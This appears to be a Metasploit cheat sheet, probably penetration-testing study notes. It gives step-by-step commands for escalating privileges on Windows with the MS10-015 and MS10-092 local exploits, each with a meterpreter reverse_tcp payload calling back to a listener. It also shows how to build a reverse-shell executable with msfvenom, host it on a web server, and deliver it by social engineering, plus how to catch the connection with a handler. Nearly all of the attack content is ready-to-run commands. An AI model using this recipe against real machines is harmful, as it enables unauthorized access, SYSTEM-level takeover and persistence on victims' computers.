Core MSFConsole Commands
Search & Discovery
# Find post-exploitation modules for Windows
search type:post platform:windows
# Find local Windows exploits (privilege escalation)
search type:exploit platform:windows path:local
Session Management
# List all background sessions
sessions -l
# Restore background session by ID
sessions -i <session_id>
Post-Exploitation: Information Gathering
Enumerate Patches & Vulnerabilities
Use the enum_patches module to identify missing patches on target:
use post/windows/gather/enum_patches
set SESSION 1
show options # Verify SESSION is set correctly
run
Note: This module requires an active session. The SESSION parameter should match an ID from sessions -l.
Privilege Escalation Exploits
MS10-015 (KiTrap0d)
Exploit kernel vulnerability to gain SYSTEM privileges:
# Get detailed info about the exploit
info exploit/windows/local/ms10_015_kitrap0d
# Configure and run the exploit
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7479
exploit
MS10-092 (Schelevator)
Run scheduled task as SYSTEM user for privilege escalation:
# Get detailed info about the exploit
info exploit/windows/local/ms10_092_schelevator
# Configure and run the exploit
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.160.110
set LPORT 7478
exploit
Payload Generation & Delivery
Create Standalone Payload with MSFVenom
Generate executable payload for manual delivery:
# Create Windows reverse TCP meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.168.110 \
LPORT=7477 \
-f exe \
-o /var/www/html/payload.exe
Setup Listener for Manual Payloads
When delivering payloads manually, setup a handler to catch connections:
use exploit/multi/handler
set LHOST 192.168.168.110
set LPORT 7477
set payload windows/meterpreter/reverse_tcp
show options # Verify settings
exploit
Getting a Meterpreter Shell: Two Approaches
Method 1: Direct Exploitation
- Use an exploit module that automatically drops and executes payload
- Listener is handled automatically by the exploit
- One-step process from exploit to shell
Method 2: Manual Payload Delivery
- Create payload using msfvenom
- Deliver payload to target (social engineering, web server, etc.)
- Setup listener using
exploit/multi/handler - Execute payload on target to establish connection
Quick Reference Checklist
Before Running Exploits
- Verify you have an active session (
sessions -l) - Check exploit requirements (
info <exploit_name>) - Ensure LHOST/LPORT are correct for your network
- Verify payload compatibility with target
After Successful Exploitation
- Check new session ID (
sessions -l) - Test session functionality (
sessions -i <id>) - Run post-exploitation modules for persistence/information gathering
Key Concepts to Remember
Session vs Shell: A session is Metasploit’s way of managing connections to compromised hosts. Multiple sessions can exist simultaneously. Local vs Remote Exploits: Local exploits run on the target system (privilege escalation), while remote exploits attack services from across the network. Payloads vs Exploits: Exploits are the attack vectors, payloads are what gets executed after successful exploitation (usually shells or meterpreter sessions).
Common Troubleshooting
Handler not catching connections: Verify LHOST/LPORT match between payload and handler
Privilege escalation fails: Run enum_patches first to identify vulnerable systems
Sessions die immediately: Check antivirus, Windows Defender, or other security controls